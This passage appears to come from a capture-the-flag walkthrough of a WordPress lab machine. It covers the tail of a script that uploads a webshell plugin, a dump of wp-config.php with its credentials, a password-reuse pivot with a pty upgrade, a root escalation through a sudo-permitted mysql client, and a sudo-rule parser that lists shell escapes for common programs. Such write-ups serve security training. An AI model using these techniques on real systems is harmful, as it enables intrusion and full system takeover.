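    if not nonce:
        return False
    ctype, body = multipart({"_wpnonce": nonce}, f"{slug}.zip", build_plugin_zip(slug, WEBSHELL_PHP))
    status, _ = _request("POST", f"{WP}/wp-admin/update.php?action=upload-plugin", cookie, body, ctype)
    return status == 200


if __name__ == "__main__":
    import sys
    # usage: python3 upload_shell.py '<Cookie header copied from the logged-in browser session>'
    print("uploaded:", upload_shell(sys.argv[1]))
    print("trigger:", shell_url("shell", "id"))
```

The trigger URL printed at the end is the one to open (with the reverse-shell one-liner in place of `id`); the zip layout is what puts the file under plugins/shell/, matching the prompt in the netcat output above.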
Privilege escalation
First establish what we are on, with `uname -a`:
www-data@wp:/var/www/html/wordpress$ uname -a
uname -a
Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Since the way in was WordPress, do not forget its configuration file, wp-config.php, which holds the database credentials and the authentication keys and salts:
www-data@wp:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
- This gives the MySQL user admin and password Wp_Admin#123 straight away.
- Logging in to MySQL with them fails, however.
- The next place to look is the home directories: `ls /home` shows a single user, wpadmin.
- Try the password we already have, adam14, for that account. Only port 80 is open, so the switch has to happen inside the reverse shell with `su wpadmin`, and su needs a tty; upgrade the shell first with `python3 -c 'import pty; pty.spawn("/bin/bash")'`.
- It works: the same password is reused for the WordPress admin and the system user. Then `cd ~` and the first flag is there:
wpadmin@wp:~$ cd ~ && ls
cd ~ && ls
local.txt
wpadmin@wp:~$ cat local.txt
cat local.txt
153495edec1b606c24947b1335998bd9
Second escalation
Checking `sudo -l` shows that wpadmin may run /usr/bin/mysql -u root -D wordpress -p as root without a sudo password:
wpadmin@wp:~$ sudo -l
sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
- sudo matches the rule against the exact argument list, so the command has to be typed exactly as listed; `-p` then makes the MySQL client prompt for the database root password, and the guess is again adam14 (the third place the same password turns up).
- Inside the mysql client, `system <command>` runs a command as root, because under sudo the client itself is running as root.
- `\! /bin/bash` (the short form of system) drops into a root bash.
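Added example (not from the page): a small parser for `sudo -l` output that flags rules like the one above, where a narrowly scoped command still yields a root shell through the program's own escape. The input is a constructed copy of the output shown above; the escape table is a short hand-picked list for illustration, not an exhaustive one.

```python
import re
from typing import List, NamedTuple

# Programs whose sudo rule is a root shell in disguise, and the escape to use.
# Hand-picked list for this example; the mysql entry is the one used on this page.
SHELL_ESCAPES = {
    "mysql": r"\! /bin/bash   (or: system /bin/bash) at the mysql> prompt",
    "vim": ":!/bin/bash",
    "vi": ":!/bin/bash",
    "less": "!/bin/bash",
    "more": "!/bin/bash",
    "man": "!/bin/bash",
    "find": ". -exec /bin/bash \\; -quit",
    "python3": "-c 'import os; os.system(\"/bin/bash\")'",
    "perl": "-e 'exec \"/bin/bash\";'",
    "awk": "'BEGIN {system(\"/bin/bash\")}'",
}


class SudoRule(NamedTuple):
    runas: str      # user the command may run as ("root", "ALL", ...)
    nopasswd: bool  # True when the NOPASSWD: tag is present
    command: str    # the command as listed, including its fixed arguments
    binary: str     # basename of the program
    escape: str     # how to turn it into a shell, "" when none is known


# Constructed copy of the `sudo -l` output shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for wpadmin on wp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User wpadmin may run the following commands on wp:
    (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
"""

# "(root) NOPASSWD: /usr/bin/mysql ..."  ->  runas, tag list, command list
_RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Turn the command section of `sudo -l` output into SudoRule records."""
    rules: List[SudoRule] = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # everything after this header is a rule line
            continue
        match = _RULE_RE.match(line) if in_commands else None
        if not match:
            continue
        runas = match.group(1).split(":")[0].strip()  # "(ALL : ALL)" -> "ALL"
        nopasswd = "NOPASSWD:" in match.group(2)
        for command in match.group(3).split(", "):  # sudo separates commands with ", "
            command = command.strip()
            if command == "ALL":
                binary, escape = "ALL", "any command is allowed, so simply: sudo /bin/bash"
            else:
                binary = command.split()[0].rsplit("/", 1)[-1]
                escape = SHELL_ESCAPES.get(binary, "")
            rules.append(SudoRule(runas, nopasswd, command, binary, escape))
    return rules


def root_shells(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that run as root (or as anyone) and have a known shell escape."""
    return [r for r in rules if r.runas in ("root", "ALL") and r.escape]


if __name__ == "__main__":
    for rule in root_shells(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if rule.nopasswd else "password required"
        print(f"[{tag}] ({rule.runas}) {rule.command}\n    escape: {rule.escape}")
```

On the sample it reports the mysql rule with its `\!` escape; the fixed arguments in the rule do not help the defender here, because the escape happens inside the client after sudo has already granted root.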
The last flag, proof.txt, is in root's home directory, and that is the end of this box.